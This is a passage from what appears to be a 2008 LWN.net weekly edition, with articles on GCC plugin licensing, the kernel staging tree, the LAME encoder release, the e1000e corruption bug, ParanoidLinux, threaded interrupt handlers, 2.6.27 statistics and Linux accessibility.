API is not, by itself, enough to scare off a determined proprietary
software vendor.  It might reduce the number of proprietary GCC modules,
but it would not eliminate them.

Alternatively, one could require plugin modules to declare their license to
the GCC core, which could then reject plugins that lack a suitable
license.  Again, experience with the kernel suggests that there are limits
to how far one can get with this approach.  Proprietary plugin vendors
could distribute a version of GCC with the license check patched out - or
just have their plugin lie about its license.

Yet another possibility is to not worry about the problem at all; it is not
clear that the world is full of vendors waiting for an opportunity to abuse
a GCC plugin API.  As GCC developer Ian Lance Taylor puts it:


	The FSF doesn't want plugins because they are concerned that people
	will start distributing proprietary plugins to gcc.  I personally
	think this is a fear from twenty years ago which shows a lack of
	understanding of today's compiler market, but, that said, the FSF
	wants to cover themselves for the future as well.


Someday, perhaps, the FSF will feel sufficiently confident to allow
unrestricted plugin access to GCC, but that does not appear to be in the
cards at this time.

What does appear to be happening, though, is an attempt to enable
plugins by way of some licensing trickery.  The GCC suite is covered by the
GPL, a fact which does not, in itself, affect the licensing of any program
which is compiled by GCC.  But GCC is more than just the compiler; it also
includes a runtime library needed to make most GCC-compiled programs
actually run.  Linking to the runtime library could cause the resulting
program to be a derived product of that library; since the runtime library
is licensed under the GPL, that could be a concern for anybody compiling
non-GPL-licensed code.  To address that concern, the runtime code has long
carried an exception to the GPL:


	As a special exception, you may use this file as part of a free
	software library without restriction.  Specifically, if other files
	instantiate templates or use macros or inline functions from this
	file, or you compile this file and link it with other files to
	produce an executable, this file does not by itself cause the
	resulting executable to be covered by the GNU General Public
	License.  This exception does not however invalidate any other
	reasons why the executable file might be covered by the GNU General
	Public License.


That is the language which enables the distribution of proprietary software
built with GCC.  The plan, said to be under consideration currently,
is to change the wording of that exemption; essentially, it would no longer
apply to code compiled with the use of proprietary GCC plugins.  The new
license is not finalized, but Mr. Taylor guesses it will look something like this:


	[I]f you modify gcc by adding GPL-incompatible software used to
	generate code, it is likely that you will not be granted any
	exception to the GPL when using the runtime library.  In other
	words, if you 1) add an optimization pass to gcc using the
	(hypothetical) plugin architecture, and 2) that optimization pass
	is not licensed under a GPL-compatible license, and 3) you generate
	object code using that optimization pass, and 4) you link that
	generated object code with the gcc runtime library (e.g., libgcc or
	libstdc++-v3), then you will not be permitted to distribute the
	resulting executable except under the terms of the GPL.


The actual wording of the new runtime license has been a long time in
coming; the FSF's lawyers want to get it right so that it discourages
undesired conduct while staying out of the way for everybody else.  It also
does not appear to be the FSF's highest priority at the moment.  So
nobody really knows when it might become official - though there have been
notes to the list suggesting that it could happen in the near future.

What we do seem to know is that it will happen, sooner or later, and the
addition of a plugin mechanism to GCC will become possible.  So the
developers are starting to think about how the API will work.  There are a
couple of existing GCC plugin frameworks already, and plenty of thoughts on
how they could be improved; see, for example, this discussion for an idea of what is being
talked about.  But the details are likely to be of interest mostly to GCC
hackers, while the end result will be beneficial to a much wider community
of developers and users.

		Moving the -staging tree


Greg Kroah-Hartman was tagged as the "maintainer of crap" at this year's Kernel Summit for his
willingness to shepherd drivers of lower quality into the mainline.  He has
not shrunk from that label, when introducing a patch set that would merge some
of those drivers.  In fact, he has embraced the label: as part of his
patch, he introduced the 
TAINT_CRAP flag for use in tainting kernels that load these, well,
crappy drivers.


There has been an ongoing
struggle between those who want to see drivers get included as quickly
as possible versus those who want to see them approach or attain normal
kernel quality levels first.  Kroah-Hartman started the -staging tree last June as a way
to increase the visibility, thus testing and bug fixing, of out-of-tree
drivers.  Because drivers in that tree have been steadily
improving—to the point where several have graduated to the
mainline—the belief is that moving -staging itself into the mainline
kernel will result in even faster progress.


So, Kroah-Hartman has introduced a new directory (drivers/staging)
to hold these drivers, as well as a mechanism to automatically taint the
kernel if any of them get loaded.  That will warn users when loading the
module—at least if they check their logs—and include that info
in any oops message that kernel might produce.  Kernel
hackers can then filter out problems depending on what
the taint is—problems in kernels tainted with binary-only drivers are
generally 
actively ignored. 


Getting those drivers into the mainline, though, will make it much easier
for folks who want to test them.  In addition, clean-ups and fixes
for the drivers will go in as mainline patches, raising the
visibility of the developers working on them.  The change should have very
minimal impact on other kernel users and developers.  In particular,
developers will not 
have to worry about reflecting API changes into drivers/staging as
Kroah-Hartman will keep them up-to-date.


The main complaint about the proposal has
been that it
duplicates the functionality or intent of the EXPERIMENTAL flag.
There was also some belief that tainting the kernel was unduly harsh, but
as Kroah-Hartman points out: "It
isn't costing 
anything, and if a developer doesn't want to debug the kernel if such a
driver is loaded, this allows them to do this." 


As part of the thread, Paul Mundt explains why
EXPERIMENTAL has no meaning in the kernel today:

EXPERIMENTAL today is pretty damn meaningless. What it tends to mean in
practice is that somethings needs some more testing, someone wants to be
able to pull out the EXPERIMENTAL card when someone enables their option
and their kernel blows up, the option/feature hasn't been around in the
kernel for that long, or someone has just been too lazy to remove the
flag (this last one probably covers about 90% of in-tree cases today).
Stuff that is actively broken (in case of your kernel blowing up, not
building, etc.) tends to be shoved under BROKEN instead.


Mundt goes on to show the default configurations almost all enable
CONFIG_EXPERIMENTAL, further reducing its meaning.  It would
be nice to audit all of the uses and restore the meaning of the flag, but
that is beyond the scope of what Kroah-Hartman has set out to do.  There
still would be a difference, though, even if EXPERIMENTAL were meaningful.
Mundt continues:

The other key difference is that even with experimental stuff in the
kernel, you will still get support, so it's not really a taintable
offense. Stuff in staging/ on the other hand while potentially not
actively hostile against the rest of the system, is still very much an
unknown, and therefore the only safe thing to do is to taint the system
and allow individual developers to make a choice regarding whether any
resulting oopses are worth looking at or not.


There are still some who are concerned about adding
less-than-kernel-quality code. Randy 
Dunlap puts it this way: "I think that we
have enough quality problems without adding crap."  But, Linus Torvalds
has always been solidly in the "merge early" camp, so this proposal 
seems likely to go in for 2.6.28.  Besides, as
Stefan Richter notes: 

OTOH many if not most of the -staging drivers are ones which are 
already in use.  Their users already deal with whatever quality problems 
these drivers have, in addition to having to fight with the installation 
hassles that are inherent to out-of-tree drivers.


In a fairly short span of time, merging drivers into the mainline has
gotten a whole lot easier.  At one time, developers might have to work on a
driver for several development cycles before it reached a quality level
that would allow it to be merged.  In the interim, the -staging tree
made things easier and more visible for testers and developers; soon that
visibility will rise substantially again.


		LAME ain't lame no more


LAME
(Lame Ain't an MP3 Encoder) is a long running open-source MP3
encoder project.  From the
About LAME
document:
"...LAME is the source code for a fully LGPL'd MP3 encoder, with speed and quality to rival and often surpass all commercial competitors.
LAME is an educational tool to be used for learning about MP3 encoding. The goal of the LAME project is to use the open source model to improve the psycho acoustics, noise shaping and speed of MP3. LAME is not for everyone - it is distributed as source code only and requires the ability to use a C compiler. However,
many popular
ripping and encoding programs include the LAME encoding engine..."


The LAME project has

announced the first release in several years:
"After rough[ly] two years of development, the LAME project has released a new version (3.98.2) of the best-known Open Source MP3 encoder.
All users are encouraged to use it, see new improvements regarding the previous releases and send feedback for the project."


LAME has a long and interesting development history.
From the LAME home page:
"LAME development started around mid-1998. Mike Cheng started it as a patch against the 8hz-MP3 encoder sources. After some quality concerns raised by others, he decided to start from scratch based on the dist10 sources. His goal was only to speed up the dist10 sources, and leave its quality untouched. That branch (a patch against the reference sources) became Lame 2.0, and only on Lame 3.81 did we replaced of all dist10 code, making LAME no more only a patch.
The project quickly became a team project. Mike Cheng eventually left leadership and started working on tooLame, an MP2 encoder. Mark Taylor became leader and started pursuing increased quality in addition to better speed. He can be considered the initiator of the LAME project in its current form. He released version 3.0 featuring
gpsycho,
a new psychoacoustic model he developed.
In early 2003 Mark left project leadership, and since then the project has been lead through the cooperation of the active developers (currently 4 individuals)."  Numerous additional
developers
have contributed to the project.


The slightly out of date
project version history
documents the changes to the code since September 1998.
Improvements added to version 3.98 (started in May, 2007) include:

Numerous bug fixes were implemented.
 A lot of code cleanup was done.
 Support was added for newer versions of various libraries.
 Many build system improvements were done.
 The RPM specification was updated.
 Numerous changes were made to the lame front end switches.
 New VBR code, derived from the NSPSY psymodel, was added.
 There were changes to the new VBR psymodel.
 The out of bits strategy for the newer VBR code was overhauled.
 PCM WAVE_FORMAT_EXTENSIBLE support was added.
 Support for ID3v2 total track count was added.
 ID3v2 TLEN support was added.
 The ATH adjustment was improved for low volume cases.
 A new SSE version of the FFT code was used.
 A flush option was added for flushing the output stream in lame.exe.  
 The FFTSSE and FFT3DNOW assembler code was back ported from the Lame4 branch.


Building the newest version of LAME on an Ubuntu 8.04.1 LTS (Hardy Heron)
i386 system was straightforward.  An older Ubuntu package of LAME was
first removed from the system using the Synaptic package manager.
The LAME version 3.98.2 source code was

downloaded, unzipped and untared.  The configure script was
run, no missing dependencies were found.
The usual make and make install steps were done.
A few test case .wav files were encoded with the command
lame file.wav file.mp3 and the files were played
with the SoX play
command as well as the closed-source
RealPlayer application.
Everything worked as expected, and sounded as good as one can
expect for an MP3 file.


Overall, the latest changes to LAME fall into the category of
maintenance or the addition of mostly user-transparent features.
It is good news that this important piece of software
is going into another phase of active development.


		The CME Group sees a future with the Linux Foundation


The Linux Foundation has another new organization on the membership
roster this week. The CME Group announced it has joined the nonprofit
organization, and its associate director, Vinod Kutty, will chair the
Foundation's End
User Council. The CME Group is made up of three derivatives, or futures,
exchanges: the Chicago Board of Trade, and the New York and Chicago
Mercantile Exchanges. Linux has played a major part of the financial
services industry for many years, and representatives of the CME Group say
it's time to become more involved in the evolution of open source
technology.
In a prepared statement Kevin Kometer, Managing Director and Chief
Information Officer of CME Group, says, "Our Linux Foundation membership
allows us to move beyond just being users of Linux to being participants in
the direction of this important technology. Joining the Linux Foundation
and being deeply involved in Linux will also help the exchange determine
the future use of our own technology."
Practically speaking, the move will increase the Group's input into the
development of software developed for the financial industry, thereby
giving them a boost in a very competitive global marketplace.
Kutty explains, "By most accounts, derivatives exchanges around the
world do not compete with one another. Unlike the securities markets that
compete for listings, the majority of derivatives products are created with
intellectual capital or they are licensed products. Our main competition
comes in the form of the over-the-counter (OTC) marketplace where 80% of the
world's derivatives trade; only 20% of derivatives globally trade on an
exchange. The OTC products often are similar or lookalike products to what
an exchange would trade."
That competitive threat is a chief reason the CME Group chose to join
the Linux Foundation.
"We're excited to see CME join, but not surprised at its
intent," says
Amanda McPherson, the Linux Foundation's VP of marketing and developer
programs. "CME realizes that direct collaboration with the Linux community
gives them a competitive advantage. They have bet their business on Linux
to very good effect. We're seeing the innovators and leaders understand
that to get the most of Linux it's important to collaborate with the
community directly. Through our end user council and the yearly
Collaboration Summits, companies like CME can collaborate closely with the
brightest minds in Linux."
While it's unusual for large financial exchanges to sit down with kernel
developers, it's not unheard of. Head Bubba, IT manager for international
financial services group, Credit Suisse, was part of a panel that met with
developers at last year's Kernel
Summit to talk about the challenges companies face when using
Linux. 
Kutty will be picking up where Bubba left off.  After attending this
year's Kernel Summit, Kutty is slated to speak on
behalf of the CME Group at October's Linux Foundation's End User Summit in
New York, where he'll be talking about how the exchange has deployed Linux
and where he hopes to see it go in the future.
Historically, financial transactions have taken place on an exchange's
trading floor in a process known as "open outcry." This method is
increasingly being replaced by electronic trading, however, and the
financial industry appears to be ready to embrace open source technology in
the process.
McPherson says, "the NYSE and most bank's trading systems are based on
Linux. We're entering a third phase of adoption by financial services and
Linux. At first it was just small, skunk works projects. Then it moved into
broad-based adoption through vendors. Now we're seeing companies getting
the most out of their investment by partnering directly with the
community."
As a means to that end, Kutty, will work with members of the End User
Council, Linux vendors, and also leaders within the Linux community to
collaborate on technical and legal issues that affect FOSS. The CME Group
has relied on Linux since 2003 and though it employs a variety of
commercial and open source tools, Linux remains the dominant technology in
use today. Kutty describes what they hope to accomplish:

The open source solutions tend to address some niches at the web tier
as well as scripting tools, performance monitoring tools, log file
analysis, development tools and simple document/content management.

Additionally, many of the GNU tools that are bundled with our Linux
distribution are taken for granted as being available for use on any system
we deploy, typically by our sysadmins as part of day-to-day
operations. Some pre-date our migration to Linux because it was and is
possible to use GNU tools on commercial UNIX. As open source alternatives
to commercial products mature, we evaluate them and select them if they
make sense. We're trying to play a more active role in the evolution of
these products higher up the stack than the OS, but our initial priority is
to focus on Linux improvements.

Given the current state of the economy in the US, any small advantage
for the financial industry is
welcome. McPherson says Linux and open source technology can certainly help
play a role in fixing what's broken. "The great thing about Linux is it's
open and gives customers a great deal of flexibility in working with their
vendors. It runs on multiple architectures and you can get support from
various vendors (or not pay for support at all). This will become more and
more appealing in our current economic environment. But given the
collaborative development model, Linux thrives in any economic environment
because of the choice it provides."

		The state of the e1000e bug


Linus Torvalds sent out the 2.6.27-rc8 release on September 29 with
this comment:


	This one should be the last one: we're certainly not running out of
	regressions, but at the same time, at some point I just have to
	pick some point, and on the whole the regressions don't look _too_
	scary.


This assertion raised a few eyebrows among those who are nervously watching
the e1000e corruption bug.  While the development community disagrees on
all kinds of issues, there is a reasonably strong consensus that
hardware-destroying bugs can be seen as "scary."

Given that, it would be nice to say that this particular regression has
been tracked down and fixed, but that is not the case.  As of this writing,
nobody knows what is causing systems with 2.6.27-rc kernels to occasionally
overwrite the EEPROM on e1000e network adapters.  The progress which had been
made, while discouragingly small, does narrow down the problem a bit:


 There was an early hypothesis that the GEM graphical memory manager
     code might be responsible for the problem.  There have been reports of
     corruption on distributions which do not package GEM, though, so GEM
     is no longer a suspect.

 For similar reasons, the idea that the page attribute table (PAT) work
     could somehow be responsible has been discarded.

 There has been a strong correlation between corrupted hardware and the
     presence of Intel graphics hardware.  That has led to a lot of
     speculation that the X.org Intel driver may somehow be doing the actual
     corruption, though a separate bug in the e1000e driver may be enabling
     that to happen.  But there is now a report of corruption with a system
     running NVIDIA graphics.  If that report is truly the same problem,
     then the X.org hypothesis will be substantially weakened.  (As an
     aside, it's worth pondering what would have happened if NVIDIA users
     had reported the problem first; the temptation to blame the
     proprietary NVIDIA driver could have been strong enough to delay
     action on the bug for some time).


So the signs point toward a problem localized within the e1000e driver, but
it is too early to make that conclusion.  This bug remains mysterious, and
it could turn out to have surprising origins.

The nature of this bug makes it harder than usual to track down.  It seems
to be dependent on some sort of race condition, so it is hard to
reproduce.  But the way in which the bug makes itself known has the effect
of greatly reducing the number of testers trying to reproduce it.  People
who can avoid that combination of software are doing so, and distributors
shipping development kernels have disabled the e1000e driver.  Dave
Airlie's approach:


	But I'm leaving this up to Intel, I don't think HP will take it too
	kindly if I keep returning my laptop.


must be fairly typical.

One gets the sense that a fairly hot fire has been ignited underneath a
number of posteriors at Intel; its developers are active in the discussion
and clearly wanting to get this one solved.  One objective has been the
creation of a utility which would return corrupted hardware to a
functioning state, but that tool has been slow in coming.  Restoring
trashed e1000e adapters appears to be a hard problem, but this is one that
Intel has to get right.  If more testers are to be encouraged to risk
corruption with the idea that the recovery tool will fix them up again,
that tool needs to actually work when the time comes.  So it is hard to
blame Intel for taking the time to ensure that the recovery tool will do
its job, but, in the mean time, its absence is making testing harder.

Frans Pop raised an interesting long-term
concern: even if this bug is fixed tomorrow, it will be present in most of
the 2.6.27 history.  Anybody bisecting the kernel in an attempt to track
down an unrelated bug risks being bitten by a zombie version of the e1000e
bug.  There may be no way to deal with that threat other than the posting
of some big warnings.  Rewriting the bug out of the mainline repository's
history is possible with git, but it would create disruption for everybody
working from a clone of the repository.

Meanwhile, there could be some interesting consequences if the resolution
of this 
problem takes much more time.  It is hard to imagine that the 2.6.27
kernel could be released with a regression of this magnitude; let us say
that the reaction in the mainstream press would not be kind.  A 2.6.27
delay could force delays in a number of upcoming distribution releases.
This kind of cascading delay would not look good; it would, instead, be
reminiscent of the troubles encountered by certain proprietary software
companies.

That said, the system is clearly working.  Testers found the problem before
the code was released in anything resembling a stable form.  Developers are
now chasing after the bug as quickly as they can.  There will be no stable
kernel or distribution releases which corrupt hardware.  This situation is
a pain, but it will be soon resolved and forgotten.

		ParanoidLinux: from fiction to reality


A novel for young adults by Cory Doctorow has inspired the creation of a
new Linux distribution focused on privacy.  ParanoidLinux is still in the planning
stages, but it adopts some interesting ideas from Doctorow's book to place
atop a Debian Testing base.  It is targeted at those who have a very strict
need to disguise their documents and network traffic because of a
repressive regime. 


Doctorow is familiar to many in the free software world, for his work
as a science fiction author as well as a digital rights activist and
blogger.  His recent novel, Little Brother is set
in the US after another devastating terrorist attack.  Because of the
attack, most civil liberties have been suspended leading some characters to
use an alternative operating system:

ParanoidLinux is an operating system that assumes that its operator is
under assault from the government (it was intended for use by Chinese and
Syrian dissidents), and it does everything it can to keep your
communications and documents a secret. It even throws up a bunch of "chaff"
communications that are supposed to disguise the fact that you're doing
anything covert. So while you're receiving a political message one
character at a time, ParanoidLinux is pretending to surf the Web and fill
in questionnaires and flirt in chat-rooms. Meanwhile, one in every five
hundred characters you receive is your real message, a needle buried in a
huge haystack.


It is that description, along with others in the book, that is guiding the
development of the "real" ParanoidLinux.  While it is relatively easy to
come up with a fictional privacy-oriented operating system, the reality of
building one is rather challenging.  The project has only existed since
May, so the current focus is to get some kind of alpha system put together
as a starting point.


The idea of "chaff" is one that
has been taken up on
the ParanoidLinux wiki.  There are several facets to the problem: how does
one generate normal-looking traffic while somehow transferring encrypted
data as 
part of that traffic.  There are existing
techniques that could be used.  Chaff combines the ideas of steganography—hiding
even the existence of a message—with cryptographic
techniques. 


The discussion about
chaff makes it clear that the ParanoidLinux developers are looking at
Doctorow's ideas carefully before implementing them.  Chaff is certainly
not a panacea, as it won't hide the traffic from an adversary that has
specifically targeted someone. It is, instead, a means to
fly under the radar, to appear to be a "normal" internet user with standard
traffic patterns.  


Using Tor (i.e. The Onion Router)
is one way to anonymously use the internet—within limits—but
traffic bound for a TOR node would be very suspicious to any monitoring
agency.  Another privacy-enhancing feature would be full-disk encryption,
but that would be yet another red flag for an agency that was inspecting
the computer.  These are kinds of trade-offs that are being discussed by
the project as they try to narrow their focus to something that can be
implemented in the near term.


Hiding, or at least obfuscating, the existence of ParanoidLinux on the
computer is another piece of the puzzle.  It could be very dangerous to be
required by the authorities to boot one's ParanoidLinux laptop.  But, if it
appears to be a "regular" system—perhaps looking much like
Windows—it may escape scrutiny.  Encrypted data might then be stored on
partitions that are 
not directly accessible from the desktop.


This is an interesting project for those who worry about government
crackdowns or perhaps already live under a repressive regime.  Even if the
ParanoidLinux distribution does not meet one's needs, the various
discussions on options and different ways to approach a privacy-oriented
operating system will be useful.  One hopes not to ever need such a system,
but knowing that people are thinking about the problem—while generating
a working version—is certainly reassuring.  For that, we can thank
Doctorow for popularizing the idea.


		Some views from Vision


Your editor had the honor of speaking at MontaVista's Vision 2008 conference
recently.  This conference - a gathering of MontaVista's customers -
provided an opportunity to observe how (part of) the embedded industry sees
itself and its role in the larger Linux community.  Relations between
embedded systems and Linux as a whole have often been a little uneasy; a
situation which probably will not change in the near future.  That said,
there are signs that 
embedded developers are starting to think about the value of engaging more
directly with the development community that they depend on.


William Mills is the Chief Technologist for Open Linux Solutions at Texas
Instruments; his brief presentation at Vision was an interesting
demonstration of how attitudes in the industry are changing.  According to
Mr. Mills, TI's method for developing Linux drivers for its products
involved doing the work behind closed doors, then distributing the result
through MontaVista.  That approach has changed, though.  TI now does its
driver work in a public git tree, with a focus on merging the code upstream
as a first priority.  Customers who want to work directly with upstream
kernels can get the code directly.


In a sense, it would appear that TI has removed MontaVista as the
intermediary which distributes drivers for TI hardware.  But TI still
distributes code through MontaVista, so customers looking for a supported,
integrated offering can still get a distribution which suits their needs.
There's no shortage of embedded systems vendors who lack the skills and the
desire to support a Linux distribution themselves; for those vendors,
buying a supported system makes a lot of sense.  For everybody else, the
software is free and part of the mainline kernel, as it should be.


MontaVista founder Jim Ready discussed "the state of embedded Linux,"
focusing on areas where there is a bit of a mismatch between what the Linux
community is providing and what the embedded industry needs.  Certain kinds
of functionality are missing; the ability to do user-space interrupt
synchronization was one example.  The rate of change in the kernel is very
high, presenting embedded vendors with the difficult choice of backporting
fixes or upgrading to a more recent kernel.  Tracing and profiling tools
are not up to the level needed by the industry.


Jim also talked some about realtime functionality, which currently must be
patched into the kernel separately.  He complained that changes made to the
mainline kernel often break the realtime patch sets, leaving developers
scrambling to make things work again.  Keeping these patches in a working
state requires constant effort; it is a significant cost.


All of this may sound like whining from an industry which
has earned a reputation for taking more from Linux than it is willing to
put back in.  But Jim put the blame directly on the embedded industry
itself; embedded vendors, he says, still haven't quite gotten it.  While
taking some pride in MontaVista's position in the list of top contributors
to the kernel, he suggested that MontaVista should be enjoying the company
of more embedded systems firms.  The embedded industry should be
contributing more to the kernel than it is.


What it comes down to, says Jim, is that the center of gravity in the Linux
development world can be found in enterprise computing.  Vendors in that
industry are contributing heavily to the kernel and, as a result, the
kernel tends to fit their needs better.  The embedded community needs to
get together and figure out how it, too, can become a more prominent
contributor and work to drive the kernel in directions which suit its
needs.


Judging from the response in the room, many of those in the audience seem
to agree with this point of view.  Some see it differently, though.  During
your editor's talk, a member of the audience asked whether the embedded
community should stop using a kernel developed by enterprise system vendors
and, instead, make its own version of the kernel suited to its needs.
Needless to say, your editor discouraged this approach; the cost of forking
the kernel and fragmenting the development community would vastly exceed
the value of any benefits gained.  But the questioner seemed unconvinced.


The clear conclusion to be made from that exchange is that there are still
people in the embedded industry who do not see the value of working with
the larger Linux development community.  It is easy to fault the embedded
community for its failure to contribute back, but it also makes sense to
look in the mirror and ask if we couldn't make a more persuasive case for
joining in.  There has been a sustained effort to encourage the embedded
systems industry to become a full participant in our community; over the
years, that work has yielded a steady stream of successes.  By continuing
and improving this work, we'll continue the process of bringing our
community together.  Then we'll truly have a single system that runs on
everything from wrist watches to supercomputers.

		Moving interrupts to threads


Processing interrupts from the hardware is a major source of latency in the
kernel, because other interrupts are blocked while doing that processing.
For this reason, the realtime tree has a feature, called threaded
interrupt handlers, that seeks to reduce the time spent with interrupts
disabled to a bare minimum—pushing the rest of the processing out
into kernel threads.  But it is not just realtime kernels that are
interested in lower latencies, so threaded handlers are being proposed for
addition to the mainline.  


Reducing latency in the kernel is one of the benefits, but there are other
advantages as well.  The biggest is probably 
reducing complexity by simplifying or avoiding locking between the "hard"
and "soft" parts 
of interrupt handling.  Threaded handlers will also help the
debuggability of the kernel and may eventually lead to the removal of tasklets from Linux.  For
these reasons, and a few others as well, Thomas Gleixner has posted a set of patches and a
"request for comments" to add threaded interrupt handlers.


Traditionally, interrupt handling has been done with top half
(i.e. the "hard" irq) that 
actually responds to the hardware interrupt and a bottom half (or
"soft" irq) that 
is scheduled by the top half to do additional processing.  The top half
executes with interrupts disabled, so it is imperative that it do as little
as possible to keep the system responsive.  Threaded
interrupt handlers reduce that work even
further, so the top half would consist of a "quick check handler" that just
ensures the interrupt is from the device; if so, it simply acknowledges the
interrupt to the 
hardware and tells the kernel to wake the interrupt handler thread. 


In the realtime tree, nearly all drivers were mass converted to use
threads, but the patch Gleixner proposes makes it optional—driver
maintainers can switch if they wish to.  Automatically converting drivers
is not necessarily popular with all maintainers, but it has an additional
downside as Gleixner notes: "Converting an interrupt to threaded
makes only sense when the handler 
code takes advantage of it by integrating tasklet/softirq
functionality and simplifying the locking."


A driver that wishes to request a threaded interrupt handler will use:

This is essentially the same as request_irq() with the addition of
the quick_check_handler.  As requested by Linus Torvalds at
this year's Kernel Summit, a new function was introduced rather than
changing countless drivers to use a new request_irq().


The quick_check_handler checks to see if the interrupt was from
the device, returning IRQ_NONE if it isn't.  It can also return
IRQ_HANDLED if no further processing is required or
IRQ_WAKE_THREAD to wake the handler thread.  One other return code
was added to simplify converting to a threaded handler.  A
quick_check_handler can be developed prior to the 
handler being converted; in that case, it returns
IRQ_NEEDS_HANDLING (instead of IRQ_WAKE_THREAD) which
will call the handler in the usual way. 


request_threaded_irq() will create a thread for the interrupt and
put a pointer to it in the struct irqaction.  In addition, a
pointer to the struct irqaction has been added to the
task_struct so that handlers can check the action flags
for newly arrived interrupts.  That reference is also used to prevent
thread crashes from causing an oops. One
of the few complaints seen so far about the proposal was a concern about wasting four or eight bytes in each
task_struct that was not an interrupt handler (i.e. the vast
majority).  That structure could be split into two types, one for the
kernel and one for user space, but it is unclear whether that will be necessary.


Andi Kleen has a more general concern that threaded interrupt handlers will
lead to bad code: 
"to be 
honest my opinion is that it will encourage badly written interrupt 
code longer term," but he seems to be in the minority.  There were
relatively few comments, but most seemed in favor—perhaps many are
waiting to see the converted driver as Gleixner promises to deliver "real
soon".  If 
major obstacles don't materialize, one would guess the linux-next tree
would be a logical next step, possibly followed by mainline merging for 2.6.29.


		Some development statistics for 2.6.27


It's that time of the development cycle again: the 2.6.27 kernel, if not
yet released by the time you read this, will be shortly.  Various other LWN
articles have looked at features found in this release; here we will look
at where that code came from.

As of 2.6.27-rc9, a total of 10,604 non-merge changesets had been
added to the mainline for the 2.6.27 kernel; those patches added a total of
826,000 lines of code  while removing 608,000, for a net growth of 217,000
lines.  There were 1,109 developers who contributed to 2.6.27, representing
over 150 employers.  376 of those developers contributed a single patch
during this development cycle.

The most active developers for 2.6.27 were:


On the changeset side, Ingo Molnar ended up on top by virtue of the
creation of large numbers of mostly x86-related changes, including a big
subarchitecture reorganization; Ingo's count also includes the addition of
ftrace, though much of that code was written by others.  Bartlomiej
Zolnierkiewicz continues to rework the old IDE layer, and Adrian Bunk, as
always, energetically cleans up code all over the tree.  David Miller's total
includes the multiqueue networking code and a lot of other changes; Alan
Cox did a lot of TTY work and big kernel lock removal.

Your editor was disappointed to come in at #23, and, thus, off the bottom
of the table.  Time to send in some quick white space fixes.  More
seriously, though, it's worth noting that there are relatively few patches
of the "trivial change" variety in the mix this time around.


If we look at changed lines, Paul Mackerras comes out on top as the result
of a single patch removing the obsolete ppc architecture.
David Woodhouse reworked the management of firmware throughout the driver tree.
Jean-François Moine brought the GSPCA webcam drivers into the tree,
then put vast amounts of effort into cleaning them up.  Artem Bityutskiy
added the UBIFS flash filesystem, and Luis Rodriguez merged the ath9k
wireless driver.


If we look at the companies behind this work, we get the following results
(note that, as always, these results are somewhat approximate):


There are not too many surprises in this table - in particular, the list of
companies at the top tends not to change very much.  That said, a few
things are worthy of note.  One is that Sun Microsystems has made its first
appearance on this list.  People complain about this company, but Sun's
engineers have been quietly fixing things all over the tree.  Broadcom is
another company with a mixed reputation in the Linux community, but
Broadcom is happy to provide support for some of its network adapters.
Nokia's strong showing in the lines-changed table results primarily from the
contribution of the UBIFS filesystem.

The most welcome change, though, is the first appearance of Atheros on this
list.  Atheros is a company which has quickly moved from a position of
complete non-cooperation to one of supporting all of its hardware in the
mainline kernel.  To say that this is an encouraging development would be an
understatement. 

All told, the 2.6.27 development cycle shows that the process continues at
full pace in a seemingly healthy state.  Developers from all over the
industry are all working together to make the kernel better for all.  The
number of companies which see participation in the process as being in
their interest is growing, as is the number of developers who contribute
patches.  The Linux kernel, it seems, is in good shape.

		Accessibility in Linux systems


The Linux kernel recently saw the addition of a "basic Braille screen reader",
and thus, the addition of a drivers/accessibility subdirectory and its
corresponding CONFIG_ACCESSIBILITY option.  It is worth noting that one of the
first reactions was "what the heck is accessibility?"  This shows how the idea
is still quite unknown to developers.

And yet the issue of GNU/Linux accessibility, i.e. the usability of GNU/Linux
by disabled people (e.g. blind people) is, of course, not new. Work in that
area has been conducted for a long time: the speakup speech screen reader
saw its 0.07 version against Linux 2.2.7 in 1999, and the brltty Braille
screen 
reader started in 1995.  The basic Braille screen reader that has just been
added to the Linux kernel is just the emerging part of that work which has been
around since then.

With the popularization of GNU/Linux among non-technical people, there has
been renewed interest in mainline accessibility support: the GNOME
desktop, 
OpenOffice.org and Firefox 3 can now be rendered via Braille and speech
synthesis thanks to the AT-SPI framework and the Orca screen reader.  KDE will
soon follow when these technologies get rebased on D-BUS.  In addition,
accessibility menus have
started appearing in the upstream distributions.

One of the main concerns
for disabled people used to be the lack of support of Javascript in text-mode
web browsers and office suite support.  With more and more companies and
governments migrating to Linux—particularly since some states require
accessibility of tools used in government—renewed development effort
was becoming more and more of a must.  In Massachusetts, people had even signed
a petition against the migration to libre software because it was not yet
accessible at the time!

What is Accessibility?

Accessibility, sometimes abbreviated a11y, means making software usable by
disabled people.  That includes blind people of course, but also people who
have low vision, are deaf, colorblind, have only one hand, can move only a few
fingers, or even only the eyes.  It also includes people with (even light)
cognitive troubles or just not familiar with the language.  Last but not least,
it includes elderly people, who often have a bit of all these disabilities.
Yes, that actually means everybody is concerned, eventually. That means support
for special devices, but also general care during development, like not assuming
that an audible alarm will be heard or a transient message will be read.

Maybe one of the most obvious accessibility techniques is speech synthesis,
which 
turns text into audio that can be sent to speakers or headphones.  There used
to be hardware speech synthesis (supported by the speakup drivers), but these
have often been replaced by software speech synthesis.  While the quality of
commercial software speech synthesis is very good these days, the quality
of free 
software vary a lot.  While there is very good libre English speech synthesis,
the support of other languages is quite diverse.  For instance, the Festival
and eSpeak libre engines easily support a wide range of languages,
but their sound is rather robotic.  There are better phoneme libraries like
mbrola, but they are often not completely libre.  To better handle all these
potential speech synthesis backends, the speech dispatcher daemon takes care
of automatically choosing the appropriate synthesis according to the desired
language and style.

Another very popular kind of device is Braille terminals.  These "show" text
by raising and lowering little pins which thus form Braille patterns.
Because their
cost is very high, a Braille terminal often has room for only 40 characters
or even 20 or 12. They integrate keys to navigate around the screen, so the
user ends up
reading it piece by piece.  Compared to speech synthesis, the reading accuracy
is far better, but not everybody can read Braille, and the cost remains very
high (on the order of $5,000).  The support of the various existing devices
is very 
good: both the brltty and suseblinux screen readers support a very wide range of
devices. 

Blind people will actually often use a combination of speech synthesis and
Braille devices.  As for other kinds of disabilities, the kind of devices varies
a lot.  It ranges from joysticks (natively supported by X.org) to eye-tracking
systems (managed by dasher), via press button (supported by the GNOME Onscreen
Keyboard) or mere screen magnification (implemented by gnome-mag).


Everyday Use

The eternal Command Line Interface vs Graphical User Interface flamewar actually
also holds for people using a Braille terminal or speech synthesis.  The
contrast is perhaps even exacerbated by the inherent difficulties of performing
anything with a computer when being disabled.

The old traditional way of using a GNU/Linux system, the text console, has
been working well with Braille devices and speech synthesis for a long time.
The principle is indeed quite simple: there are 25 lines
